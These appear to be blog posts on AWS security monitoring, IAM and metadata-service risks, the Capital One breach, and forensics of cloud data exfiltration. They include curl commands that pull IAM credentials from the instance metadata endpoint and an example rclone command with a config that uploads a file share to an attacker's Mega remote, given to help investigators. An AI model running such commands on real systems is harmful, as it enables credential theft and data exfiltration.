
Search Results


  • AWS Security Incident Response Guide: A Dive into CloudWatch, GuardDuty, and Amazon Detective

    This post is a dive into AWS's very own Security Incident Response Guide. While I'll cover some of the main highlights here, it's worth taking a full look yourself—they've balanced technical depth with an easy-to-follow structure. You can check out the guide here: https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/enrich-security-logs-and-findings.html

-------------------------------------------------------------------------

AWS Shared Responsibility Model

One of the first things to understand when working with AWS security is their Shared Responsibility Model. It's simple: AWS handles the security of the cloud infrastructure, and you're responsible for securing what you put in the cloud. Here's the breakdown: if you're running a VPC with EC2 instances, you need to handle things like patching the OS, securing access, and configuring networks. On the flip side, if you're using something like an AWS Lightsail MySQL database, AWS takes care of the underlying infrastructure while you manage the database's credentials and access settings. In short, AWS makes sure the cloud itself is secure, but it's up to you to secure your data and apps. You can read more here: https://aws.amazon.com/compliance/shared-responsibility-model/

-------------------------------------------------------------------------

AWS Incident Domains

According to the AWS Security Incident Response Guide, there are three main domains to watch when responding to security incidents:

Service Domain: Issues with the AWS account itself—usually caused by compromised credentials. Attackers might use these to access your environment, view your data, or change configurations.

Infrastructure Domain: Network-level incidents, often due to a vulnerable or misconfigured app exposed to the internet. These incidents could involve an attacker gaining a foothold in your VPC and even trying to spread within your cloud or back into your on-premises environment.

Application Domain: Attackers target your hosted apps, often exploiting vulnerabilities like SQL injection to get unauthorized access to sensitive data.

More on incident domains can be found at https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/incident-domains.html

-------------------------------------------------------------------------

AWS Detection and Response Tools

In case of an incident, AWS has a range of tools to help you investigate and respond:

CloudTrail: Logs API activity in your account, tracking user actions, configurations, and more. It's a key service for understanding what's happening in your environment.
CloudWatch: Monitors resources and applications, and lets you set up alerts for suspicious activity.
GuardDuty: AWS's threat detection service, which specifically looks for compromised accounts or unusual activity in your environment.
Macie: Focuses on sensitive data like PII and can alert you when data exposure risks arise, especially in S3 buckets.

-------------------------------------------------------------------------

AWS Log Analysis: CloudTrail Overview

CloudTrail is a key player in monitoring your AWS environment. It logs all the actions taken in your AWS account at the API level—everything from logins to configuration changes.
The logs are stored for 90 days by default, but you can easily archive them in an S3 bucket for longer retention. You can search the logs using the CloudTrail console or services like Athena and AWS Detective. By default, CloudTrail is almost real-time, with events typically logged within 15 minutes. It's free for 90 days, but longer-term storage will require setting up a custom trail to an S3 bucket. More info can be found at https://aws.amazon.com/cloudtrail/faqs/

-------------------------------------------------------------------------

CloudTrail Log Format

CloudTrail logs are stored in JSON format, making them easy to read and analyze. The logs contain useful fields, such as: API caller information (who did what), time of the API call, source IP (where the request came from), and request parameters and response elements, which can contain nested data for more detailed information. Since AWS supports over 200 services, most of them can log actions into CloudTrail. For more details, check the supported services: https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-aws-service-specific-topics.html

To work with JSON-formatted logs more easily, use tools like:
https://jqlang.github.io/jq/
https://jqplay.org/

-------------------------------------------------------------------------

Anomaly Detection in AWS

AWS offers several tools to detect unusual or malicious activity in your environment:

CloudTrail Insights: Uses machine learning to spot strange patterns in your AWS usage, like sudden spikes in resource use or odd IAM actions. It's not enabled by default, so you'll need to set it up for each trail. However, there's an extra cost for this feature (about $0.35 per 100,000 events).
GuardDuty: Focuses on security issues and provides real-time threat detection across your AWS environment.
Macie: Great for identifying sensitive data (like PII) and ensuring your S3 buckets are properly configured to protect that data.

For more on how these services work, see the full guide: https://cloudcompiled.com/blog/cloudwatch-cloudtrail-difference/

-------------------------------------------------------------------------

AWS CloudWatch

CloudWatch is the go-to tool for monitoring in AWS, but it's not just about keeping an eye on performance and uptime. While its core focus is availability and performance, you can send logs from most AWS services to CloudWatch, making it a versatile tool for security monitoring too. Once logs are in, you can configure alerts and automation rules to respond to security threats. Here's how AWS describes it: "You can use CloudWatch to detect anomalous behavior in your environments, set alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your applications running smoothly."

It's important to note that while basic health monitoring with CloudWatch is free, more advanced logging and monitoring will incur additional costs. Many companies have shared their best practices for configuring CloudWatch for security monitoring. Even commercial security vendors, like Trend Micro and Intelligent Discovery, offer predefined monitoring configurations for CloudWatch, which can also serve as inspiration for setting up your own rules.
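As a concrete illustration of turning CloudTrail data into a CloudWatch rule, here is a minimal AWS CLI sketch that flags unauthorized API calls. It assumes a trail is already delivering events to a CloudWatch Logs group; the log group name, metric namespace, and SNS topic ARN are illustrative placeholders, and the filter pattern follows the commonly published CIS-style example rather than anything specific to this guide.

# Turn matching CloudTrail events into a custom metric
aws logs put-metric-filter \
  --log-group-name "CloudTrail/DefaultLogGroup" \
  --filter-name "UnauthorizedAPICalls" \
  --filter-pattern '{ ($.errorCode = "*UnauthorizedOperation") || ($.errorCode = "AccessDenied*") }' \
  --metric-transformations metricName=UnauthorizedAPICalls,metricNamespace=CloudTrailMetrics,metricValue=1

# Alarm on the metric and notify a (placeholder) SNS topic
aws cloudwatch put-metric-alarm \
  --alarm-name "unauthorized-api-calls" \
  --metric-name UnauthorizedAPICalls \
  --namespace CloudTrailMetrics \
  --statistic Sum --period 300 --threshold 1 \
  --comparison-operator GreaterThanOrEqualToThreshold \
  --evaluation-periods 1 \
  --alarm-actions arn:aws:sns:us-east-1:111122223333:security-alerts

The same metric filter plus alarm pattern works for console logins without MFA, root account usage, security group changes, and similar events.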
CloudWatch has layers of complexity, and while we're only scratching the surface, it's worth diving deeper if you want more control over your AWS monitoring. For a deeper look into AWS security monitoring, check out the article "What You Need to Know About AWS Security Monitoring, Logging, and Alerting".

-------------------------------------------------------------------------

AWS GuardDuty

If CloudWatch is AWS's all-purpose monitor, GuardDuty is the one with a laser focus on security threats. GuardDuty scans your environment for suspicious activities across different layers, including:

Control plane (via CloudTrail management events)
Data plane (monitoring S3 data access)
Network plane (checking VPC flow logs and Route 53 DNS logs)

GuardDuty uses a mix of anomaly detection, machine learning, and malicious IP lists to detect threats like unauthorized account access, compromised resources, or unusual S3 activity. What's great is that it does all of this out-of-band, meaning it doesn't impact the performance of your systems. Integration with major cybersecurity vendors also adds value to GuardDuty's alerts, allowing you to get more context and take action across both cloud and on-prem environments. Pricing is based on the volume of events processed, and you can find more details about the costs and the alerts it covers at https://aws.amazon.com/guardduty/pricing/ For a complete list of integrations and partners that enhance GuardDuty, check out the partner directory: https://aws.amazon.com/guardduty/resources/partners/

-------------------------------------------------------------------------

Amazon Detective

Amazon Detective is like the investigator that steps in after the alarm has been raised. It doesn't focus on detecting threats like GuardDuty; instead, it helps you respond to them more effectively by adding context to alerts. It pulls data from sources like GuardDuty alerts, CloudTrail logs, and VPC flow logs to give you a clearer picture of what's happening. Think of Detective as a tool to help you connect the dots after a security alert. It can be particularly useful when dealing with complex incidents that need deeper investigation. Like other AWS services, it comes with a 30-day free trial, but keep in mind that GuardDuty is a prerequisite for using Detective.

Another useful tool in AWS's security stack is Security Hub, which consolidates findings from various AWS services like GuardDuty, Macie, and AWS Config into a single dashboard for easier management. This makes it easier to see both preventative and active threat data in one place. For more info on Detective, check out the FAQs and the blog post "Amazon Detective – Rapid Security Investigation and Analysis".

-------------------------------------------------------------------------

Conclusion

AWS offers a powerful suite of tools for monitoring, detecting, and investigating security incidents in your cloud environment. CloudWatch provides a flexible platform for performance and security monitoring, enabling users to set alerts and automate actions based on logs from various AWS services. GuardDuty takes this a step further, focusing specifically on detecting threats across the control, data, and network planes using advanced techniques like machine learning and anomaly detection.
When a security alert is triggered, Amazon Detective steps in to provide valuable context, helping you analyze and respond effectively to incidents.

Akash Patel

  • Power of AWS: EC2, AMIs, and Secure Cloud Storage Solutions

    AWS Regions and API Endpoints

Amazon Web Services (AWS) is a cloud platform offering a vast array of services that can be accessed and managed via APIs. These services are hosted in multiple regions across the globe, and each AWS service in a region has a unique endpoint. An endpoint is a URL that consists of a service code and a region code, following the format: <service-code>.<region-code>.amazonaws.com

Examples of service codes:
EC2: Elastic Compute Cloud (VMs) - ec2
S3: Simple Storage Service - s3
IAM: Identity and Access Management - iam

The list of all AWS services and their corresponding service codes can be found at https://docs.aws.amazon.com/general/latest/gr/aws-service-information.html

Example of an API endpoint: to interact with EC2 instances in the US-East-1 region, the endpoint would be ec2.us-east-1.amazonaws.com. AWS operates over 200 services globally, each accessible through region-specific endpoints.

Reference: https://aws.amazon.com/what-is-aws/

-------------------------------------------------------------------------

Amazon Resource Name (ARN)

Amazon Resource Names (ARNs) are unique identifiers used in AWS to refer to resources programmatically. ARNs follow a specific format to ensure resources can be identified across all AWS regions and services. ARNs are commonly found in logs or configuration files when you need to specify a resource precisely.

ARN format: arn:partition:service:region:account-id:resource
Example: arn:aws:iam:us-east-1:690735260167:role/flowlogsRole

Partition: Typically aws (for standard AWS regions)
Service: The AWS service code (e.g., ec2, s3)
Region: The AWS region (e.g., us-east-1)
Account-ID: The AWS account ID associated with the resource
Resource: Specifies the resource or resource type (can include wildcards)

While ARNs can precisely specify resources, they also allow for wildcards in some instances (e.g., for querying multiple resources). However, wildcard usage in configurations can lead to overly broad permissions, posing security risks.

Reference: https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html

-------------------------------------------------------------------------

AWS Cloud Networking Constructs

AWS provides a flexible and secure networking model using Virtual Private Cloud (VPC), which allows users to create isolated networks for hosting services. Within a VPC, several components are used to manage and structure the networking:

VPC (Virtual Private Cloud): A logically isolated section of the AWS cloud where you can launch AWS resources (such as EC2 instances) within a defined network.

Components within a VPC:

Subnet: A segment within a VPC that allows the network to be divided into smaller sub-networks. Each VPC must have at least one subnet.

Route Table: Similar to a router in a traditional network, a route table defines how traffic is routed between subnets or to external networks like the Internet. A route to the Internet requires either an Internet Gateway or a NAT Gateway.

Internet Gateway: Allows EC2 instances with public IPs to access the Internet. While the instance's network interface retains its private IP, an Internet Gateway enables the routing of traffic between the instance's public IP and external sources.

NAT Gateway: Used for outgoing Internet traffic from instances with private IP addresses.
It performs a similar function to home network NAT gateways, allowing private instances to connect to the Internet.

Security Group: A virtual firewall that controls inbound and outbound traffic for EC2 instances. Security groups can be specific to an individual EC2 instance or shared across multiple instances within the same VPC.

Reference: https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html

-------------------------------------------------------------------------

AWS Computing Constructs

EC2 (Elastic Compute Cloud) is AWS's scalable virtual machine (VM) service that runs on their proprietary hypervisor. EC2 provides a range of instance types to suit different workloads, from general-purpose instances to compute-optimized and memory-optimized configurations. You can explore the variety of available instance types on the AWS EC2 instance types page.

Key features:
Instance Types: Different combinations of CPU, memory, storage, and networking to fit various use cases.
Auto-Scaling: EC2 instances can be dynamically scaled based on traffic or load requirements.
Pay-As-You-Go Pricing: You only pay for what you use, based on the time and resources consumed.

AMI (Amazon Machine Images)

AMIs are pre-configured VM templates designed for easy deployment. These images come with the necessary operating systems and utilities to run in AWS. AMIs vary from minimal base OS images (such as Linux or Windows) to complex images pre-installed with software for specific tasks.

SIFT AMI: One notable AMI is the SANS Community SIFT VM, a preconfigured forensic image, which can be found via its GitHub repository.
AWS Marketplace: Thousands of AMIs are available through the AWS Marketplace, including those with licensed commercial software.

-------------------------------------------------------------------------

AWS Storage Constructs

AWS provides a variety of storage options, including S3 (Simple Storage Service) and EBS (Elastic Block Storage), each serving different purposes based on accessibility, scalability, and performance needs.

S3 (Simple Storage Service)

S3 is an object storage service known for its scalability, flexibility, and durability. S3 allows users to store any type of data (files, media, backups) and access it from anywhere on the internet.

Highly Scalable: You can store an unlimited amount of data.
Object-Based Storage: Ideal for files and media rather than application disk storage.
Access Controls: S3 features complex permission settings, including bucket policies, access control lists (ACLs), and encryption.

S3 Security: Despite its flexibility, S3 has been involved in multiple data breaches due to misconfigurations. While AWS has improved the UI to minimize user errors, poor configurations have historically exposed large amounts of data. For example, high-profile breaches occurred due to public access settings or misinterpretations of policies, like the "Any authenticated AWS user" option, which inadvertently opened data access to any AWS account.

EBS (Elastic Block Storage)

EBS is a block storage service primarily used as a hard drive for EC2 instances. EBS volumes are tied to specific EC2 instances and are ideal for applications requiring consistent, low-latency disk storage.

Volume Types: Different types of EBS volumes support various workloads, such as SSD for high transactional applications and HDD for throughput-focused tasks.
Snapshots: EBS volumes can be easily backed up using snapshots, which can be stored long-term or used for disaster recovery.
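Snapshots are also handy during incident response for preserving a copy of a suspect instance's disk. A minimal AWS CLI sketch (the volume ID and tag values are illustrative placeholders):

# Snapshot the volume attached to a suspect instance
aws ec2 create-snapshot \
  --volume-id vol-0123456789abcdef0 \
  --description "IR evidence - web01 root volume" \
  --tag-specifications 'ResourceType=snapshot,Tags=[{Key=Case,Value=IR-2024-001}]'

# Check snapshot progress
aws ec2 describe-snapshots --owner-ids self \
  --filters Name=volume-id,Values=vol-0123456789abcdef0

The snapshot can then be shared with a dedicated forensics account and mounted on an analysis instance without touching the original volume.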
Reference: https://aws.amazon.com/ebs/

-------------------------------------------------------------------------

S3 in the News for the Wrong Reasons

Several S3 data breaches have occurred over the years, often due to misconfigurations rather than inherent security flaws. Two common issues include:

Overly Broad Permissions: Administrators have mistakenly allowed public access or configured the built-in group "Any authenticated AWS user," granting access to anyone with an AWS account rather than just their organization.

Hard-coded Security Keys: Developers have accidentally exposed AWS access keys in code repositories like GitHub, leading to unauthorized access. In one notable incident, AWS keys were committed to a public GitHub repository, and within 5 minutes attackers had exploited the keys to spin up EC2 instances for cryptocurrency mining.

To help prevent these issues, AWS has implemented features that detect leaked credentials and restrict public access to S3 buckets by default.

Examples of S3 breaches include:

U.S. Voter Records: In a 2017 breach, 198 million U.S. voter records were exposed due to a misconfigured S3 bucket.
Defense Contractor: Sensitive intelligence data was exposed when an S3 bucket belonging to a defense contractor was left publicly accessible.

https://www.zdnet.com/article/security-lapse-exposes-198-million-united-states-voter-records/
https://arstechnica.com/information-technology/2017/05/defense-contractor-stored-intelligence-data-in-amazoncloud-unprotected/
https://www.theregister.com/2020/07/21/twilio_javascript_sdk_code_injection/
https://github.com/nagwww/s3-leaks

-------------------------------------------------------------------------

Conclusion

AWS provides powerful and scalable cloud computing and storage solutions through services like EC2, AMIs, S3, and EBS. These services offer flexibility for a wide range of workloads, whether you need virtual machines, pre-configured templates, or reliable storage options. However, with great flexibility comes responsibility—especially when it comes to security. Misconfigurations in S3 buckets and improper access management can lead to serious data breaches, as seen in numerous high-profile incidents. By following best practices for access control, encryption, and key management, users can leverage AWS's full potential while maintaining robust security and compliance.

Akash Patel

  • AWS: Understanding Accounts, Roles, Secure Access, the AWS Instance Metadata Service (IMDS), and the Capital One Breach

    Amazon Web Services (AWS) has grown into a powerful platform used by businesses around the world to manage their data, infrastructure, and applications in the cloud. From its beginnings in 2006 with Simple Storage Service (S3), AWS has evolved into a multi-layered service offering that powers much of today's internet.

-------------------------------------------------------------------------

AWS Control Tower and AWS Organizations: Structuring Your Cloud Environment

At the heart of AWS deployments is the AWS account. Each AWS account provides a dedicated environment where you can host services like S3, EC2 (Elastic Compute Cloud), databases, and more. But managing these services across multiple departments or projects in a single account can get tricky. This is where AWS Control Tower and AWS Organizations come in.

What is AWS Control Tower? AWS Control Tower is a tool designed to help set up and manage a multi-account AWS environment. Think of it as a blueprint or template that helps you organize and secure multiple AWS accounts under a single organization. Even though it's not mandatory, using Control Tower is a recommended practice for companies managing a large cloud environment. It provides an easy way to enforce security policies and best practices across all accounts.

What is AWS Organizations? AWS Organizations allows you to group multiple AWS accounts together under one roof, making it easier to manage them from the top down. This structure enables you to apply consistent administration and security policies across all your accounts. Within AWS Organizations, you can create Organizational Units (OUs) to group accounts for specific business units or projects, and apply different policies to each group. For example, your HR department could have separate accounts for hosting employee data, while the Sales department could have accounts for managing customer data. By separating these functions, you can secure them independently and keep billing records clean and accurate for each department.

-------------------------------------------------------------------------

Managing AWS Accounts and Root Users

Each AWS account has a root user created when the account is first set up. This root user has full control over the account, but best practice is to minimize the use of the root user to prevent security risks. Instead, it's better to create Identity and Access Management (IAM) users or roles to manage day-to-day operations.

IAM Users and Roles

IAM (Identity and Access Management) is AWS's system for managing user permissions and access. It allows you to create users and assign roles based on what tasks they need to perform. For example, an administrator might have full access to everything, while a developer might only need access to specific services like EC2 or S3.

IAM users: These are individual identities with specific permissions. For example, Jane might have an IAM user account with access to AWS Lambda but not EC2.
IAM roles: These allow temporary access to an AWS account for specific tasks. Roles are often used for cross-account access or to allow external services to access AWS resources.

The principle of Least Privilege is key here—only give users and roles the minimum permissions they need to do their jobs.
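To make least privilege concrete, here is a minimal sketch of creating and attaching a narrowly scoped policy with the AWS CLI. The bucket name, policy name, user name, and account ID are illustrative placeholders, not values from this post.

least-privilege-s3.json:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::example-reports-bucket",
        "arn:aws:s3:::example-reports-bucket/*"
      ]
    }
  ]
}

# Create the policy and attach it to one specific IAM user
aws iam create-policy --policy-name ReportReadOnly --policy-document file://least-privilege-s3.json
aws iam attach-user-policy --user-name jane --policy-arn arn:aws:iam::111122223333:policy/ReportReadOnly

Compared with attaching a broad managed policy such as AmazonS3FullAccess, this grants read access to a single bucket and nothing else.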
-------------------------------------------------------------------------

AWS Secure Token Service (STS) and Temporary Credentials

When users or services need temporary access to AWS resources, they can use the AWS Secure Token Service (STS). STS generates temporary credentials that can last from a few minutes to several hours. This is particularly useful for external users or cross-account access, where you don't want to hand out long-term credentials.

STS credentials: These are similar to regular IAM credentials but are short-lived, reducing the risk of them being compromised. After they expire, users need to request new credentials.
Federation and roles: If you have users who are authenticated through external services (like Google or Active Directory), STS can provide temporary AWS access by using federated roles. For example, if a consultant needs access to your AWS environment, you can create a temporary IAM role with limited permissions, and they can assume that role using STS.

-------------------------------------------------------------------------

Best Practices for Secure AWS Authentication

There are several ways to log into AWS, but the most common methods are through the AWS Management Console, the AWS CLI, or programmatically using access keys. Here's how to make sure your environment stays secure:

1. Use Multi-Factor Authentication (MFA): For both the root account and any IAM users, it's highly recommended to enable MFA. This adds an extra layer of security, requiring both a password and a one-time code from a mobile app or hardware token.

2. Rotate Access Keys: For programmatic access, AWS provides access key and secret key combinations. It's important to regularly rotate these keys to reduce the risk of exposure. AWS allows each user to have two active sets of access keys, making it easier to rotate them without disrupting services.

3. Use Short-Term Credentials: When possible, avoid using long-term credentials like access keys. Instead, use temporary credentials via STS or instance roles. These credentials expire after a set time, reducing the risk of misuse.

-------------------------------------------------------------------------

AWS Roles, Federation, and Cross-Account Access

One of AWS's strengths is its ability to manage roles across different accounts and even organizations. For instance, AWS allows cross-account access through roles. Let's say your company is collaborating with a third party, and they need access to your AWS resources. You can create a role for them to assume in your account, granting them limited, temporary access.

Federation: Allows users from an external directory (like Active Directory) to access AWS resources using Single Sign-On (SSO) or SAML authentication.
Cross-account roles: These allow users from one AWS account to assume roles in another AWS account, similar to trusts between domains in Microsoft Active Directory.
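As a quick illustration of how that looks in practice, the third party would assume the role through STS and receive short-lived keys. The role ARN, session name, and account ID below are illustrative placeholders:

aws sts assume-role \
  --role-arn arn:aws:iam::111122223333:role/ConsultantReadOnly \
  --role-session-name consultant-audit \
  --duration-seconds 3600

# The response contains an AccessKeyId, SecretAccessKey, and SessionToken
# that expire automatically when the session ends.

Because the credentials expire on their own, there is nothing long-lived to leak or rotate once the engagement is over.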
-------------------------------------------------------------------------

For further reading, check out AWS's comprehensive guides on best practices: AWS IAM Best Practices, AWS Organizations FAQs, and AWS Secure Token Service (STS).

-------------------------------------------------------------------------

What is the AWS Instance Metadata Service (IMDS)?

The AWS Instance Metadata Service (IMDS) is a feature available on Amazon EC2 instances that provides information about the instance and temporary IAM credentials. It allows the instance to retrieve details like its hostname, network configuration, and, most importantly, the IAM role credentials assigned to the instance. While useful for many applications, IMDS also presents a potential security risk if misused, as seen in the infamous Capital One data breach.

The Instance Metadata Service (IMDS) runs on a dedicated non-public network and is accessible only from within the EC2 instance itself. IMDS provides crucial information for an EC2 instance, including temporary credentials for any IAM role assigned to the instance. The metadata can be accessed at the following endpoints:

IPv4: http://169.254.169.254/latest/meta-data/
IPv6: http://[fd00:ec2::254]/latest/meta-data/

IAM Role Credentials via Metadata

When an EC2 instance is configured with an IAM role, you can retrieve the role's temporary access credentials using the metadata service by querying:

http://169.254.169.254/latest/meta-data/iam/security-credentials/

You'll receive the Access Key ID, Secret Key, and Session Token in clear text, which can be used to interact with AWS services like S3. The temporary credentials are typically short-lived, providing an extra layer of security since they expire after a certain time. While this service is extremely convenient for developers and system administrators, it can also be exploited if an attacker manages to access the EC2 instance or misconfigurations allow indirect access.

-------------------------------------------------------------------------

Potential Exploits of IMDS

Though the metadata service is restricted to internal network access, attackers can still gain access to sensitive data through various techniques if the EC2 instance is compromised.

Server-Side Request Forgery (SSRF) Attacks

One of the most notorious attack vectors is Server-Side Request Forgery (SSRF), where an attacker tricks a vulnerable application into querying internal services, such as the metadata service. By manipulating web requests, an attacker can obtain the instance's metadata, including the IAM role credentials, which they can then use to access AWS resources. For example, misconfigured reverse proxies can be exploited by sending HTTP requests with modified headers to trick the proxy into querying the metadata service. A 2018 article by Michael Higashi, "Instance Metadata API: A Modern Day Trojan Horse," highlighted how simple this can be, using a curl command to obtain sensitive credentials by querying the internal metadata service.

-------------------------------------------------------------------------

The Capital One Data Breach

In 2019, one of the largest cloud data breaches in history affected Capital One, resulting in the exposure of sensitive information of more than 100 million customers. This breach was directly related to the misuse of AWS instance metadata.

How the Attack Happened

SSRF Vulnerability: The attacker identified a vulnerable web application firewall (WAF) running on an EC2 instance in Capital One's environment. By using a Server-Side Request Forgery (SSRF) attack, the attacker was able to query the instance metadata service and steal the EC2 instance's temporary IAM role credentials.
Using IAM Role Credentials: After obtaining the credentials, the attacker used them to gain access to Amazon S3 buckets. These credentials provided read access to over 700 S3 buckets containing sensitive data. The attacker copied the data, which included personal and financial information.

Data Exfiltration: The attacker exfiltrated sensitive data belonging to Capital One customers, including Social Security Numbers, bank account details, and credit scores.

This breach not only revealed security misconfigurations within Capital One's infrastructure but also highlighted the risks associated with IMDS when misused.

Mitigating the Risk: IMDSv2

After the Capital One breach and similar incidents, AWS introduced IMDSv2 to address these risks. The key improvements include:

Session Token Requirement: IMDSv2 requires a session token to be obtained using an HTTP PUT request before any data can be accessed. This prevents simple GET requests from accessing sensitive metadata.
Protection Against SSRF: Most WAFs and reverse proxies do not support PUT requests, making it much harder for attackers to exploit SSRF vulnerabilities to access IMDS.
TTL Settings: The new version sets the Time-to-Live (TTL) for metadata requests to 1, which prevents external routing hosts from passing the requests further, reducing the chances of metadata leaks.

While IMDSv2 greatly reduces the risk of metadata service attacks, AWS has not deprecated IMDSv1. Organizations need to actively switch to IMDSv2 and enforce its use to protect their EC2 instances from similar exploits.
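The difference is easy to see from a shell on the instance itself. Under IMDSv1 a single GET is enough, while IMDSv2 requires a token obtained via PUT; the last command shows how IMDSv2 can be enforced on an existing instance (the instance ID is an illustrative placeholder):

# IMDSv1: one unauthenticated GET - this is what SSRF attacks abuse
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# IMDSv2: first obtain a session token with a PUT, then present it as a header
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Require IMDSv2 (and a hop limit of 1) on an existing instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1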
-------------------------------------------------------------------------

How to Secure EC2 Instances Against Metadata Exploits

Here are key steps you can take to protect your AWS environment from metadata-related attacks:

Use IMDSv2: When launching new EC2 instances, configure them to use IMDSv2. AWS allows you to enforce this via instance metadata options. You can require all metadata requests to use session tokens, adding an extra layer of security.
Limit IAM Role Permissions: Apply the principle of Least Privilege to IAM roles assigned to EC2 instances. Ensure that roles only have access to the minimum AWS resources they need.
Monitor for SSRF Exploits: Regularly audit your web applications for SSRF vulnerabilities. Tools like AWS WAF and third-party security solutions can help detect and block suspicious requests that could lead to SSRF attacks.
Enable Logging and Alerts: Use AWS CloudTrail to monitor API activity, including the usage of temporary credentials retrieved from the metadata service. Set up alerts for unusual activity, such as large-scale S3 data access.
Use Security Groups: Apply security groups to control inbound and outbound traffic for your EC2 instances. Restrict network access to only what is necessary for the instance to function.

-------------------------------------------------------------------------

Conclusion

AWS provides a powerful and flexible cloud platform, but managing its security requires a thoughtful approach to account structure, user management, and access controls. By using these tools, you can ensure that your AWS environment remains secure, scalable, and easy to manage. The AWS Instance Metadata Service (IMDS) is also a powerful tool, but it comes with significant risks if misconfigured or exploited. By upgrading to IMDSv2, following best practices for IAM role management, and actively monitoring for vulnerabilities, organizations can secure their cloud infrastructure and avoid similar incidents.

Akash Patel

  • Cloud Services: Understanding Data Exfiltration and Investigation Techniques

    In today's cybercrime landscape, attackers are increasingly turning to cloud services for data exfiltration. While this presents additional challenges for defenders, it also offers opportunities to track and mitigate the damage.

The Shift to Cloud-Based Exfiltration

Cloud storage providers have become popular among attackers because they meet key requirements:

Speed and availability: Attackers need fast, scalable infrastructure to quickly move large amounts of stolen data.
Cost-efficiency: Many cloud services offer significant storage at minimal or no cost.
Less visibility: Cloud platforms are generally not on security blacklists, making it harder for traditional defenses to detect the exfiltration.

Attackers streamline their operations by using cloud platforms to exfiltrate data. In some cases, the copy stored in the cloud is the only copy the attackers have, which they later use to demand ransom or release the data publicly. The efficiency of using a single storage location means attackers can avoid time-consuming data copying, making their extortion schemes quicker and harder to track.

Fast Response from Cloud Providers

While attackers use cloud platforms, the providers have become more cooperative in helping victims. Many cloud providers act quickly on takedown requests, often removing malicious data within hours or minutes. This means that although cloud services are used for exfiltration, they are rarely used for data distribution because of the prompt responses from the providers. However, gaining access to the cloud shares used for exfiltration can provide valuable insights for the victim. Accessing the attacker's cloud storage allows investigators to:

Assess the extent of the data stolen.
Make the data unusable by inserting traps like canary tokens or zip bombs.
Gather information on other potential victims, especially when attackers reuse cloud accounts across multiple breaches.

In some instances, investigators have been able to notify other breached organizations before the attackers could fully execute their plans, offering a rare preemptive defense against encryption or further exfiltration.

-------------------------------------------------------------------------

Investigating the Exfiltration Process

During investigations, we often find that attackers have used common tools and techniques to identify and exfiltrate sensitive data from an organization's network. Ransomware cases frequently reveal how attackers plan their operations, from identifying sensitive file shares to the exfiltration itself. The following steps outline the typical exfiltration process:

1. Scanning for Sensitive Shares

Attackers often start by scanning the network for shared folders that might contain sensitive data. Tools like SoftPerfect Network Scanner are frequently used for this task. These tools display available share names and show which users are logged in to the machines, helping attackers prioritize targets. From an investigative standpoint, defenders can sometimes recover partial screenshots or cache files of the attacker's scanning activity. For example, attackers may be particularly interested in machines where admin users are logged in or shares named after departments like "HR," "Finance," or "Confidential." Fortunately, these shares may not always contain the most critical data, but they still serve as key entry points for attackers.
2. Tracking the Attackers' Actions

Understanding what the attackers were looking for and where they browsed can be crucial for assessing the damage. To do this, defenders can rely on artifacts like MountPoints and Shellbags, both of which provide forensic insights into the attackers' activities.

MountPoints: These are stored in registry keys and show what external storage devices (like USB drives) or network shares were mounted. By examining the registry, investigators can track which shares attackers connected to using the "net use" command. Tools like Registry Explorer by Eric Zimmerman are particularly useful for browsing these entries.

Shellbags: These artifacts store user preferences for Windows Explorer windows, including the location and size of the windows. They also store the directory paths the user browsed. Since Shellbags are stored per user, investigators can pinpoint specific actions by the attacker, even tracking when and where they navigated. ShellBags Explorer is another tool by Zimmerman that helps present this data in a clear, tree-like structure. https://www.cyberengage.org/post/shell-bags-analysis-tool-sbecmd-exe-or-shellbagsexplorer-gui-version-very-important-artifact

When attackers use an account that should never have interactive sessions (such as a service account), Shellbags allow investigators to reconstruct where they navigated using Windows Explorer, complete with timestamps.

-------------------------------------------------------------------------

Tools Used by Attackers for Exfiltration

In our investigations, we frequently encounter two tools for data exfiltration: rclone and MegaSync. Both tools allow for efficient, encrypted data transfer, making them ideal for attackers.

1. MegaSync

MegaSync is the official desktop app for syncing with Mega.io, a cloud storage platform popular with attackers due to its encryption and large storage capacity. While the traffic and credentials for MegaSync are heavily encrypted, the application generates a logfile in binary format. Tools like Velociraptor can parse these log files to extract the names of uploaded files, giving investigators a clearer idea of what was exfiltrated.

2. Rclone

Rclone is a command-line tool for managing files across more than 40 cloud storage platforms, including Mega.io. Its appeal lies in its support for HTTPS uploads, which bypass many traditional security filters, unlike FTP. Attackers often create a configuration file (rclone.conf) to store credentials and other transfer settings, speeding up the exfiltration process by minimizing the number of commands they need to enter. Investigators can target these configuration files, which hold valuable information such as the cloud service being used, stored credentials, and more. In many cases, the configuration file may be encrypted, but attackers occasionally decrypt certain files to prove they have the keys. Investigators can sometimes trick the attackers into decrypting the rclone.conf file, allowing them to gain access to the exfiltration details.
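For context, a recovered rclone.conf for a Mega remote typically looks something like the sketch below; the remote name, account, and paths are illustrative, and the pass value is stored in rclone's obscured format rather than plaintext:

[exfil]
type = mega
user = attacker@example.com
pass = 2oJ9kQ...obscured...

# A typical exfiltration command then looks like:
rclone copy "C:\Shares\Finance" exfil:loot --transfers 8 --log-file upload.log

Finding a command line like this in EDR telemetry or process-creation event logs, together with the configuration file, tells you which remote was used and which directories were staged for upload.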
Alternative Techniques for Recovering Exfiltration Data

Even if direct access to the rclone configuration is not possible, defenders can use more advanced methods like volume snapshots and string searches to recover artifacts related to the exfiltration.

Volume snapshots: These provide older versions of a hard drive, akin to Apple's Time Machine. Although attackers often try to delete these snapshots, tools like vss_carver can help recover them, providing valuable forensic data. https://github.com/mnrkbys/vss_carver

